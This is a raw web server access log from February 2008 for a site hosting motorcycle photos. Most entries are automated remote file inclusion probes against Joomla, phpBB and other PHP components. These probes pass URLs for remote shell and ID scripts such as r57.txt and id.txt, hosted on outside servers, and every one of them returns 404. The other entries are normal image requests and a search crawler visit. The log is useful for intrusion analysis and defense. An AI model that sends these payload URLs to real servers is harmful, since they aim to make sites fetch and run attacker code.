202.60.64.18 - - [19/Feb/2008:05:47:29 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
202.60.64.18 - - [19/Feb/2008:05:47:31 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
209.172.34.237 - - [19/Feb/2008:05:47:31 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:47:38 -0800] "GET /logs/access_080104.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:48:11 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:48:11 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:48:12 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:48:16 -0800] "GET /logs/access_080104.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:49:05 -0800] "GET /logs/access_080104.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:49:08 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:49:08 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:49:09 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:49:23 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:49:23 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:49:23 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:49:24 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.172.183.206 - - [19/Feb/2008:05:49:24 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
217.172.183.206 - - [19/Feb/2008:05:49:26 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:49:43 -0800] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:05:49:50 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:49:50 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:05:50:04 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:50:30 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:50:31 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:50:31 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:50:45 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:50:47 -0800] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:50:47 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.90 - - [19/Feb/2008:05:50:49 -0800] "GET /logs/access_071230.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.piesse.org/koma/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.172 - - [19/Feb/2008:05:51:01 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.172 - - [19/Feb/2008:05:51:01 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:51:04 -0800] "GET /logs/access_080106.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:51:04 -0800] "GET /logs/access_080106.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.1.47 - - [19/Feb/2008:05:52:36 -0800] "GET /logs/access_080101.log/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:52:52 -0800] "GET /bikes/dteel/2008_02_15/IMG_4522s.JPG HTTP/1.1" 200 292217 "http://www.st-owners.com/forums/showthread.php?p=390251" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:52:52 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:05:53:14 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:05:53:23 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:53:51 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.200.153 - - [19/Feb/2008:05:55:36 -0800] "GET ////////vwar/convert/mvcw.php?step=1&vwar_root=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.47.200.153 - - [19/Feb/2008:05:55:36 -0800] "GET /logs////////vwar/convert/mvcw.php?step=1&vwar_root=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.172.183.206 - - [19/Feb/2008:05:56:28 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
217.172.183.206 - - [19/Feb/2008:05:56:28 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
85.14.221.150 - - [19/Feb/2008:05:56:29 -0800] "GET /logs/access_080117.log/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [19/Feb/2008:05:56:29 -0800] "GET /werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [19/Feb/2008:05:56:30 -0800] "GET /logs/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.95.158.183 - - [19/Feb/2008:05:57:20 -0800] "GET /bikes/dteel/2008_02_16/IMG_4543s.JPG HTTP/1.1" 200 257277 "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
69.95.158.183 - - [19/Feb/2008:05:57:20 -0800] "GET /bikes/dteel/2008_02_15/IMG_4519s.JPG HTTP/1.1" 200 208989 "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
69.95.158.183 - - [19/Feb/2008:05:57:21 -0800] "GET /bikes/dteel/2008_02_15/IMG_4501s.JPG HTTP/1.1" 200 323465 "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
69.95.158.183 - - [19/Feb/2008:05:57:26 -0800] "GET /bikes/dteel/2008_02_16/IMG_4524s.JPG HTTP/1.1" 200 229589 "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
69.95.158.183 - - [19/Feb/2008:05:57:29 -0800] "GET /bikes/dteel/2008_02_15/IMG_4522s.JPG HTTP/1.1" 200 292217 "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
69.95.158.183 - - [19/Feb/2008:05:57:32 -0800] "GET /bikes/dteel/2008_02_16/IMG_4525s.JPG HTTP/1.1" 200 275808 "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
69.95.158.183 - - [19/Feb/2008:05:57:33 -0800] "GET /bikes/dteel/2008_02_16/IMG_4536s.JPG HTTP/1.1" 200 85494 "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
69.95.158.183 - - [19/Feb/2008:05:57:35 -0800] "GET /bikes/dteel/2008_02_16/IMG_4527s.JPG HTTP/1.1" 200 327693 "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
69.95.158.183 - - [19/Feb/2008:05:57:40 -0800] "GET /bikes/dteel/2008_02_16/IMG_4557s.JPG HTTP/1.1" 200 232435 "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
69.95.158.183 - - [19/Feb/2008:05:57:41 -0800] "GET /bikes/dteel/2008_02_16/IMG_4547s.JPG HTTP/1.1" 200 300279 "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:57:45 -0800] "GET /logs/access.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:57:46 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:57:46 -0800] "GET /logs//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:57:56 -0800] "GET /logs/access_080111.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:57:56 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:58:01 -0800] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:05:58:14 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:05:58:19 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:58:19 -0800] "GET /logs/access.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:58:20 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:58:20 -0800] "GET /logs//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:58:27 -0800] "GET /logs/access_080111.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:58:28 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:58:28 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:58:33 -0800] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:05:58:40 -0800] "GET /logs/access_080130.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.86.114 - - [19/Feb/2008:05:59:05 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.86.114 - - [19/Feb/2008:05:59:06 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:05:59:14 -0800] "GET /logs/access_071120.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:05:59:14 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.222.47 - - [19/Feb/2008:05:59:27 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.176.201 - - [19/Feb/2008:05:59:38 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:05:59:39 -0800] "GET /logs/access.log/ultrastats/include/functions_common.php?gl_root_path=http://www.koudal.dk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.176.201 - - [19/Feb/2008:05:59:39 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:05:59:39 -0800] "GET /logs/access.log/ultrastats/include/functions_common.php?gl_root_path=http://exhumed.ifrance.com/list? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:05:59:40 -0800] "GET /ultrastats/include/functions_common.php?gl_root_path=http://exhumed.ifrance.com/list? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:05:59:40 -0800] "GET /logs/ultrastats/include/functions_common.php?gl_root_path=http://www.koudal.dk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:05:59:40 -0800] "GET /logs/ultrastats/include/functions_common.php?gl_root_path=http://exhumed.ifrance.com/list? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [19/Feb/2008:05:59:53 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:06:00:07 -0800] "GET //components/com_zoom/classes/iptc/EXIF_.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:06:00:07 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:06:00:08 -0800] "GET //components/com_zoom/classes/iptc/EXIF_.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:06:00:08 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:06:00:08 -0800] "GET //components/com_zoom/classes/iptc/EXIF_.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.9.1.148 - - [19/Feb/2008:06:00:08 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_.php?mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.7.108.240 - - [19/Feb/2008:06:00:38 -0800] "GET /logs/access_080120.log/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [19/Feb/2008:06:00:38 -0800] "GET /Forums/admin/admin_db_utilities.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [19/Feb/2008:06:00:38 -0800] "GET /logs/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.229.95.19 - - [19/Feb/2008:06:00:44 -0800] "GET /logs/access_080120.log/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.229.95.19 - - [19/Feb/2008:06:00:45 -0800] "GET /Forums/admin/admin_db_utilities.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.229.95.19 - - [19/Feb/2008:06:00:45 -0800] "GET /logs/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.5.200.237 - - [19/Feb/2008:06:01:04 -0800] "GET /bikes/dteel/2008_02_16/IMG_4543s.JPG HTTP/1.1" 200 257277 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
65.5.200.237 - - [19/Feb/2008:06:01:04 -0800] "GET /bikes/dteel/2008_02_15/IMG_4501s.JPG HTTP/1.1" 200 323465 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
65.5.200.237 - - [19/Feb/2008:06:01:06 -0800] "GET /bikes/dteel/2008_02_15/IMG_4519s.JPG HTTP/1.1" 200 208989 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
65.5.200.237 - - [19/Feb/2008:06:01:07 -0800] "GET /bikes/dteel/2008_02_15/IMG_4516s.JPG HTTP/1.1" 200 328645 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
65.5.200.237 - - [19/Feb/2008:06:01:08 -0800] "GET /bikes/dteel/2008_02_16/IMG_4524s.JPG HTTP/1.1" 200 229589 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
